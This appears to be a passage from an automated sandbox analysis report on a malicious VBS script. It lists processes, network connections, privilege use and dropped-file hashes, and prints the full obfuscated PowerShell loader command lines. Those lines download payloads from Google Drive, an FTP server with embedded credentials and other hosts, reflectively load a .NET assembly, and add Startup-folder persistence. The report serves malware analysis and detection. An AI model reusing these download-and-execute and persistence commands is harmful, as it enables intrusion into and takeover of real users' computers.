| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\596a00476cdbd7a3f93ec08a71f1a356e4289da5017132ee631368d4b2251e23.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9Ќз革DsЌз革KQЌз革gЌз革CkЌз革IЌз革Ќз革nЌз革DEЌз革ZQB1Ќз革HIЌз革dЌз革Ќз革nЌз革CЌз革Ќз革LЌз革Ќз革gЌз革GUЌз革agB3Ќз革HoЌз革aЌз革Ќз革kЌз革CЌз革Ќз革LЌз革Ќз革gЌз革CcЌз革aЌз革B0Ќз革HQЌз革cЌз革BzЌз革DoЌз革LwЌз革vЌз革G0Ќз革ZQBoЌз革HIЌз革ZQBlЌз革G4Ќз革YwByЌз革GUЌз革YQB0Ќз革GkЌз革bwBuЌз革C4Ќз革YwBvЌз革G0Ќз革LwBpЌз革G4Ќз革LgB0Ќз革HgЌз革dЌз革Ќз革nЌз革CЌз革Ќз革KЌз革Ќз革gЌз革F0Ќз革XQBbЌз革HQЌз革YwBlЌз革GoЌз革YgBvЌз革FsЌз革IЌз革Ќз革sЌз革CЌз革Ќз革bЌз革BsЌз革HUЌз革bgЌз革kЌз革CЌз革Ќз革KЌз革BlЌз革GsЌз革bwB2Ќз革G4Ќз革SQЌз革uЌз革CkЌз革IЌз革Ќз革nЌз革EkЌз革VgBGЌз革HIЌз革cЌз革Ќз革nЌз革CЌз革Ќз革KЌз革BkЌз革G8Ќз革aЌз革B0Ќз革GUЌз革TQB0Ќз革GUЌз革RwЌз革uЌз革CkЌз革JwЌз革xЌз革HMЌз革cwBhЌз革GwЌз革QwЌз革uЌз革DMЌз革eQByЌз革GEЌз革cgBiЌз革GkЌз革TЌз革BzЌз革HMЌз革YQBsЌз革EMЌз革JwЌз革oЌз革GUЌз革cЌз革B5Ќз革FQЌз革dЌз革BlЌз革EcЌз革LgЌз革pЌз革CЌз革Ќз革WgBjЌз革EIЌз革YwBhЌз革CQЌз革IЌз革Ќз革oЌз革GQЌз革YQBvЌз革EwЌз革LgBuЌз革GkЌз革YQBtЌз革G8Ќз革RЌз革B0Ќз革G4Ќз革ZQByЌз革HIЌз革dQBDЌз革DoЌз革OgBdЌз革G4Ќз革aQBhЌз革G0Ќз革bwBEЌз革HЌз革Ќз革cЌз革BBЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革7Ќз革CkЌз革IЌз革Ќз革pЌз革CЌз革Ќз革JwBBЌз革CcЌз革IЌз革Ќз革sЌз革CЌз革Ќз革JwCTIToЌз革kyEnЌз革CЌз革Ќз革KЌз革BlЌз革GMЌз革YQBsЌз革HЌз革Ќз革ZQBSЌз革C4Ќз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革gЌз革CgЌз革ZwBuЌз革GkЌз革cgB0Ќз革FMЌз革NЌз革Ќз革2Ќз革GUЌз革cwBhЌз革EIЌз革bQBvЌз革HIЌз革RgЌз革6Ќз革DoЌз革XQB0Ќз革HIЌз革ZQB2Ќз革G4Ќз革bwBDЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BaЌз革GMЌз革QgBjЌз革GEЌз革JЌз革Ќз革gЌз革F0Ќз革XQBbЌз革GUЌз革dЌз革B5Ќз革EIЌз革WwЌз革7Ќз革CcЌз革JQBJЌз革GgЌз革cQBSЌз革FgЌз革JQЌз革nЌз革CЌз革Ќз革PQЌз革gЌз革GUЌз革agB3Ќз革HoЌз革aЌз革Ќз革kЌз革DsЌз革KQЌз革gЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革IЌз革Ќз革oЌз革GcЌз革bgBpЌз革HIЌз革dЌз革BTЌз革GQЌз革YQBvЌз革GwЌз革bgB3Ќз革G8Ќз革RЌз革Ќз革uЌз革HIЌз革dwBjЌз革GwЌз革JЌз革Ќз革gЌз革D0Ќз革IЌз革BnЌз革FMЌз革egBDЌз革EIЌз革bЌз革Ќз革kЌз革DsЌз革OЌз革BGЌз革FQЌз革VQЌз革6Ќз革DoЌз革XQBnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgB0Ќз革HgЌз革ZQBUЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgByЌз革HcЌз革YwBsЌз革CQЌз革OwЌз革pЌз革HQЌз革bgBlЌз革GkЌз革bЌз革BDЌз革GIЌз革ZQBXЌз革C4Ќз革dЌз革BlЌз革E4Ќз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革TwЌз革tЌз革HcЌз革ZQBOЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革DsЌз革KQЌз革oЌз革GUЌз革cwBvЌз革HЌз革Ќз革cwBpЌз革GQЌз革LgByЌз革HcЌз革YwBsЌз革CQЌз革OwЌз革pЌз革CЌз革Ќз革JwB0Ќз革HgЌз革dЌз革Ќз革uЌз革DEЌз革MЌз革BMЌз革EwЌз革RЌз革Ќз革vЌз革DEЌз革MЌз革Ќз革vЌз革HIЌз革ZQB0Ќз革HЌз革Ќз革eQByЌз革GMЌз革cЌз革BVЌз革C8Ќз革cgBiЌз革C4Ќз革bQBvЌз革GMЌз革LgB0Ќз革GEЌз革cgBiЌз革HYЌз革awBjЌз革HMЌз革ZQBkЌз革C4Ќз革cЌз革B0Ќз革GYЌз革QЌз革Ќз革xЌз革HQЌз革YQByЌз革GIЌз革dgBrЌз革GMЌз革cwBlЌз革GQЌз革LwЌз革vЌз革DoЌз革cЌз革B0Ќз革GYЌз革JwЌз革gЌз革CgЌз革ZwBuЌз革GkЌз革cgB0Ќз革FMЌз革ZЌз革BhЌз革G8Ќз革bЌз革BuЌз革HcЌз革bwBEЌз革C4Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革OwЌз革pЌз革CcЌз革QЌз革BЌз革Ќз革HЌз革Ќз革SgЌз革4Ќз革DcЌз革NQЌз革xЌз革DIЌз革bwByЌз革HЌз革Ќз革cgBlЌз革HЌз革Ќз革bwBsЌз革GUЌз革dgBlЌз革GQЌз革JwЌз革sЌз革CkЌз革KQЌз革5Ќз革DQЌз革LЌз革Ќз革2Ќз革DEЌз革MQЌз革sЌз革DcЌз革OQЌз革sЌз革DQЌз革MQЌз革xЌз革CwЌз革OЌз革Ќз革5Ќз革CwЌз革OЌз革Ќз革xЌз革DEЌз革LЌз革Ќз革3Ќз革DЌз革Ќз革MQЌз革sЌз革DkЌз革OQЌз革sЌз革DUЌз革MQЌз革xЌз革CwЌз革MQЌз革wЌз革DEЌз革LЌз革Ќз革wЌз革DЌз革Ќз革MQЌз革oЌз革F0Ќз革XQBbЌз革HIЌз革YQBoЌз革GMЌз革WwЌз革gЌз革G4Ќз革aQBvЌз革GoЌз革LQЌз革oЌз革CgЌз革bЌз革BhЌз革GkЌз革dЌз革BuЌз革GUЌз革ZЌз革BlЌз革HIЌз革QwBrЌз革HIЌз革bwB3Ќз革HQЌз革ZQBOЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwЌз革gЌз革HQЌз革YwBlЌз革GoЌз革YgBvЌз革C0Ќз革dwBlЌз革G4Ќз革IЌз革Ќз革9Ќз革CЌз革Ќз革cwBsЌз革GEЌз革aQB0Ќз革G4Ќз革ZQBkЌз革GUЌз革cgBDЌз革C4Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革DsЌз革OЌз革BGЌз革FQЌз革VQЌз革6Ќз革DoЌз革XQBnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgB0Ќз革HgЌз革ZQBUЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgByЌз革HcЌз革YwBsЌз革CQЌз革OwЌз革pЌз革HQЌз革bgBlЌз革GkЌз革bЌз革BDЌз革GIЌз革ZQBXЌз革C4Ќз革dЌз革BlЌз革E4Ќз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革TwЌз革tЌз革HcЌз革ZQBOЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革DsЌз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革7Ќз革DIЌз革MQBzЌз革GwЌз革VЌз革Ќз革6Ќз革DoЌз革XQBlЌз革HЌз革Ќз革eQBUЌз革GwЌз革bwBjЌз革G8Ќз革dЌз革BvЌз革HIЌз革UЌз革B5Ќз革HQЌз革aQByЌз革HUЌз革YwBlЌз革FMЌз革LgB0Ќз革GUЌз革TgЌз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革bЌз革BvЌз革GMЌз革bwB0Ќз革G8Ќз革cgBQЌз革HkЌз革dЌз革BpЌз革HIЌз革dQBjЌз革GUЌз革UwЌз革6Ќз革DoЌз革XQByЌз革GUЌз革ZwBhЌз革G4Ќз革YQBNЌз革HQЌз革bgBpЌз革G8Ќз革UЌз革BlЌз革GMЌз革aQB2Ќз革HIЌз革ZQBTЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革DsЌз革fQBlЌз革HUЌз革cgB0Ќз革CQЌз革ewЌз革gЌз革D0Ќз革IЌз革BrЌз革GMЌз革YQBiЌз革GwЌз革bЌз革BhЌз革EMЌз革bgBvЌз革GkЌз革dЌз革BhЌз革GQЌз革aQBsЌз革GEЌз革VgBlЌз革HQЌз革YQBjЌз革GkЌз革ZgBpЌз革HQЌз革cgBlЌз革EMЌз革cgBlЌз革HYЌз革cgBlЌз革FMЌз革OgЌз革6Ќз革F0Ќз革cgBlЌз革GcЌз革YQBuЌз革GEЌз革TQB0Ќз革G4Ќз革aQBvЌз革FЌз革Ќз革ZQBjЌз革GkЌз革dgByЌз革GUЌз革UwЌз革uЌз革HQЌз革ZQBOЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwB7Ќз革CЌз革Ќз革ZQBzЌз革GwЌз革ZQB9Ќз革CЌз革Ќз革ZgЌз革vЌз革CЌз革Ќз革MЌз革Ќз革gЌз革HQЌз革LwЌз革gЌз革HIЌз革LwЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革bgB3Ќз革G8Ќз革ZЌз革B0Ќз革HUЌз革aЌз革BzЌз革CЌз革Ќз革OwЌз革nЌз革DЌз革Ќз革OЌз革Ќз革xЌз革CЌз革Ќз革cЌз革BlЌз革GUЌз革bЌз革BzЌз革CcЌз革IЌз革BkЌз革G4Ќз革YQBtЌз革G0Ќз革bwBjЌз革C0Ќз革IЌз革BlЌз革HgЌз革ZQЌз革uЌз革GwЌз革bЌз革BlЌз革GgЌз革cwByЌз革GUЌз革dwBvЌз革HЌз革Ќз革OwЌз革gЌз革GUЌз革YwByЌз革G8Ќз革ZgЌз革tЌз革CЌз革Ќз革KQЌз革gЌз革CcЌз革cЌз革B1Ќз革HQЌз革cgBhЌз革HQЌз革UwBcЌз革HMЌз革bQBhЌз革HIЌз革ZwBvЌз革HIЌз革UЌз革BcЌз革HUЌз革bgBlЌз革E0Ќз革IЌз革B0Ќз革HIЌз革YQB0Ќз革FMЌз革XЌз革BzЌз革HcЌз革bwBkЌз革G4Ќз革aQBXЌз革FwЌз革dЌз革BmЌз革G8Ќз革cwBvЌз革HIЌз革YwBpЌз革E0Ќз革XЌз革BnЌз革G4Ќз革aQBtЌз革GEЌз革bwBSЌз革FwЌз革YQB0Ќз革GEЌз革RЌз革BwЌз革HЌз革Ќз革QQBcЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革RgBHЌз革HIЌз革VQBBЌз革CQЌз革IЌз革Ќз革oЌз革CЌз革Ќз革bgBvЌз革GkЌз革dЌз革BhЌз革G4Ќз革aQB0Ќз革HMЌз革ZQBEЌз革C0Ќз革IЌз革Ќз革nЌз革CUЌз革SQBoЌз革HEЌз革UgBYЌз革CUЌз革JwЌз革gЌз革G0Ќз革ZQB0Ќз革EkЌз革LQB5Ќз革HЌз革Ќз革bwBDЌз革CЌз革Ќз革OwЌз革gЌз革HQЌз革cgBhЌз革HQЌз革cwBlЌз革HIЌз革bwBuЌз革C8Ќз革IЌз革B0Ќз革GUЌз革aQB1Ќз革HEЌз革LwЌз革gЌз革FEЌз革QQBqЌз革HoЌз革SQЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革YQBzЌз革HUЌз革dwЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革bЌз革BsЌз革GUЌз革aЌз革BzЌз革HIЌз革ZQB3Ќз革G8Ќз革cЌз革Ќз革gЌз革DsЌз革KQЌз革nЌз革HUЌз革cwBtЌз革C4Ќз革bgBpЌз革HcЌз革cЌз革BVЌз革FwЌз革JwЌз革gЌз革CsЌз革IЌз革BkЌз革EkЌз革UgBpЌз革E0Ќз革JЌз革Ќз革oЌз革CЌз革Ќз革PQЌз革gЌз革FEЌз革QQBqЌз革HoЌз革SQЌз革7Ќз革CkЌз革IЌз革BlЌз革G0Ќз革YQBOЌз革HIЌз革ZQBzЌз革FUЌз革OgЌз革6Ќз革F0Ќз革dЌз革BuЌз革GUЌз革bQBuЌз革G8Ќз革cgBpЌз革HYЌз革bgBFЌз革FsЌз革IЌз革Ќз革rЌз革CЌз革Ќз革JwBcЌз革HMЌз革cgBlЌз革HMЌз革VQBcЌз革DoЌз革QwЌз革nЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革RgBHЌз革HIЌз革VQBBЌз革CQЌз革OwЌз革pЌз革CcЌз革dQBzЌз革G0Ќз革LgBuЌз革GkЌз革dwBwЌз革FUЌз革XЌз革Ќз革nЌз革CЌз革Ќз革KwЌз革gЌз革GQЌз革SQBSЌз革GkЌз革TQЌз革kЌз革CЌз革Ќз革LЌз革BCЌз革EsЌз革TЌз革BSЌз革FUЌз革JЌз革Ќз革oЌз革GUЌз革bЌз革BpЌз革EYЌз革ZЌз革BhЌз革G8Ќз革bЌз革BuЌз革HcЌз革bwBEЌз革C4Ќз革eЌз革BoЌз革EoЌз革SЌз革B5Ќз革CQЌз革OwЌз革4Ќз革EYЌз革VЌз革BVЌз革DoЌз革OgBdЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HQЌз革eЌз革BlЌз革FQЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HgЌз革aЌз革BKЌз革EgЌз革eQЌз革kЌз革DsЌз革KQB0Ќз革G4Ќз革ZQBpЌз革GwЌз革QwBiЌз革GUЌз革VwЌз革uЌз革HQЌз革ZQBOЌз革CЌз革Ќз革dЌз革BjЌз革GUЌз革agBiЌз革E8Ќз革LQB3Ќз革GUЌз革TgЌз革oЌз革CЌз革Ќз革PQЌз革gЌз革HgЌз革aЌз革BKЌз革EgЌз革eQЌз革kЌз革DsЌз革fQЌз革7Ќз革CЌз革Ќз革KQЌз革nЌз革HQЌз革TwBMЌз革GMЌз革XwBLЌз革GEЌз革MwBaЌз革GYЌз革bwBYЌз革DIЌз革SgBKЌз革HIЌз革VgBoЌз革G0Ќз革VgЌз革5Ќз革GMЌз革bQЌз革5Ќз革FgЌз革cwB1Ќз革FgЌз革bQBqЌз革DEЌз革ZwЌз革xЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革RgBhЌз革EUЌз革WQBSЌз革CQЌз革KЌз革Ќз革gЌз革D0Ќз革IЌз革BGЌз革GEЌз革RQBZЌз革FIЌз革JЌз革B7Ќз革CЌз革Ќз革ZQBzЌз革GwЌз革ZQB9Ќз革DsЌз革IЌз革Ќз革pЌз革CcЌз革MgЌз革0Ќз革HUЌз革WЌз革BKЌз革FQЌз革cQBhЌз革G0Ќз革ZwB5Ќз革E0Ќз革dЌз革BGЌз革HoЌз革YQBrЌз革FЌз革Ќз革UgЌз革xЌз革HEЌз革XwBJЌз革HYЌз革RwBpЌз革FgЌз革TgBkЌз革HEЌз革YQBOЌз革DEЌз革JwЌз革gЌз革CsЌз革IЌз革BGЌз革GEЌз革RQBZЌз革FIЌз革JAAoACAAPQAgAEYAYQBFAFkAUgAkAHsAIAApACAAVwBpAGkAQgBzACQAIAAoACAAZgBpADsAIAApACcANAA2ACcAKABzAG4AaQBhAHQAbgBvAEMALgBFAFIAVQBUAEMARQBUAEkASABDAFIAQQBfAFIATwBTAFMARQBDAE8AUgBQADoAdgBuAGUAJAAgAD0AIABXAGkAaQBCAHMAJAA7ACcAPQBkAGkAJgBkAGEAbwBsAG4AdwBvAGQAPQB0AHIAbwBwAHgAZQA/AGMAdQAvAG0AbwBjAC4AZQBsAGcAbwBvAGcALgBlAHYAaQByAGQALwAvADoAcwBwAHQAdABoACcAIAA9ACAARgBhAEUAWQBSACQAOwApACAAJwB1AHMAbQAuAG4AaQB3AHAAVQBcACcAIAArACAAZABJAFIAaQBNACQAIAAoACAAbABlAGQAOwApACgAaAB0AGEAUABwAG0AZQBUAHQAZQBHADoAOgBdAGgAdABhAFAALgBPAEkALgBtAGUAdABzAHkAUwBbACAAPQAgAGQASQBSAGkATQAkAHsAIAApACAARgBkAE0AUQBUACQAIAAoACAAZgBpADsAIAApADIAKABzAGwAYQB1AHEARQAuAHIAbwBqAGEATQAuAG4AbwBpAHMAcgBlAFYALgB0AHMAbwBoACQAIAA9ACAARgBkAE0AUQBUACQAIAA7AA==';$nQCfu = $qKKzc.replace('Ќз革' , 'A') ;$IedxR = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nQCfu ) ); $IedxR = $IedxR[-1..-$IedxR.Length] -join '';$IedxR = $IedxR.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\596a00476cdbd7a3f93ec08a71f1a356e4289da5017132ee631368d4b2251e23.vbs');powershell $IedxR
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $TQMdF = $host.Version.Major.Equals(2) ;if ( $TQMdF ) {$MiRId = [System.IO.Path]::GetTempPath();del ( $MiRId + '\Upwin.msu' );$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yHJhx = (New-Object Net.WebClient);$yHJhx.Encoding = [System.Text.Encoding]::UTF8;$yHJhx.DownloadFile($URLKB, $MiRId + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MiRId + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\596a00476cdbd7a3f93ec08a71f1a356e4289da5017132ee631368d4b2251e23.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$lcwr = (New-Object Net.WebClient);$lcwr.Encoding = [System.Text.Encoding]::UTF8;$lcwr.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $lcwr.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$lcwr.dispose();$lcwr = (New-Object Net.WebClient);$lcwr.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $lcwr.DownloadString( $lBCzSg );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\596a00476cdbd7a3f93ec08a71f1a356e4289da5017132ee631368d4b2251e23.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ni/moc.noitaercneerhem//:sptth' , $hzwje , 'true1' ) );};"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\qyxaz.ps1"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\596a00476cdbd7a3f93ec08a71f1a356e4289da5017132ee631368d4b2251e23.vbs"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3188 -ip 3188
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3188 -s 620
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ftp.desckvbrat.com.br | udp |
| BR | 191.252.83.213:21 | ftp.desckvbrat.com.br | tcp |
| US | 8.8.8.8:53 | 35.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.83.252.191.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| BR | 191.252.83.213:60031 | ftp.desckvbrat.com.br | tcp |
| US | 8.8.8.8:53 | api.pastecode.io | udp |
| US | 104.21.72.79:443 | api.pastecode.io | tcp |
| US | 8.8.8.8:53 | 79.72.21.104.in-addr.arpa | udp |
| BR | 191.252.83.213:60381 | ftp.desckvbrat.com.br | tcp |
| US | 8.8.8.8:53 | mehreencreation.com | udp |
| IN | 180.149.241.246:443 | mehreencreation.com | tcp |
| US | 8.8.8.8:53 | 246.241.149.180.in-addr.arpa | udp |
| BR | 191.252.83.213:60940 | ftp.desckvbrat.com.br | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
memory/2924-0-0x00007FFDD28E3000-0x00007FFDD28E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qql0cdm4.sqp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2924-10-0x000002587FA60000-0x000002587FA82000-memory.dmp
memory/2924-11-0x00007FFDD28E0000-0x00007FFDD33A1000-memory.dmp
memory/2924-12-0x00007FFDD28E0000-0x00007FFDD33A1000-memory.dmp
memory/4776-22-0x0000020ED4F50000-0x0000020ED4F5A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1
| MD5 | 19946e95a41725115cec67d7f34debe3 |
| SHA1 | e70750c8d3bb506ebbbb20c95ab3e0bb997662b3 |
| SHA256 | 6e1d35082ecd842548f1f541879474f5600f916af173020eb06a7b928aead7f4 |
| SHA512 | 2f48a312f9d520543ebc0fe18d8f3b2f8b2b1c9e45c7fdfe3ef517f128dbb9a3112fd2af41979f8b775973503f0c626b588a0f19cf4f9237bf3a874473659200 |
memory/2924-36-0x00007FFDD28E3000-0x00007FFDD28E5000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 96c9d581cfb5f15fce3f11be06735ea3 |
| SHA1 | 93464cb23333b44ebe83643eb94329101f2ad4b7 |
| SHA256 | 07b70c5ac76adc19ca26500e3c3fd380eae2ece3f198a56eaf538e5b8ff04c85 |
| SHA512 | 7c0080a1610321a756dab29b0b6341ba63e2eaa31e105d45f3c556ca84148bebc4ec50e7c063b7e4c32287e15a3a6e2d1169eeeac767f1c719f62c0b56abff5c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 01d89dd05c27325bbfe34d7a2bc716ad |
| SHA1 | fa0a5ce95e7e989da44face5a736172aba834ddc |
| SHA256 | 52bf1aacc2b2f03b2bbdca40b7eff5e041c8f2892575b3bf5cbaa000a02f71e9 |
| SHA512 | d7500eae5877d297fec543b607a1e6764ac07002178e92306de9b5a9cc76d9f42cdaa9a2b086ed1d3174c660afa120228affa80a4fb1ac4a430f7028449e0adb |
memory/2924-45-0x00007FFDD28E0000-0x00007FFDD33A1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\qyxaz.ps1
| MD5 | 932b9ae2695ba933db2fe7a431173995 |
| SHA1 | d417b1b0d6864358851a712b2a7c1c051a732b16 |
| SHA256 | 7a320fa3ff70637f346a7bb2fb2549a8f07ee2baa5f38c8972b459e4d1960c71 |
| SHA512 | c3b58fd334dcd0aa21b551bf95a0ddf5eebaf38606c45187e583a6df5c6d9bd8057b2d28a872c95b013c11e02def313446b21f42dcd11b4364acf0e9b2221383 |
memory/440-57-0x0000018073F20000-0x0000018073F2A000-memory.dmp
memory/3188-58-0x0000000000400000-0x0000000000455000-memory.dmp
memory/3188-62-0x0000000000400000-0x0000000000455000-memory.dmp
memory/3188-60-0x0000000000400000-0x0000000000455000-memory.dmp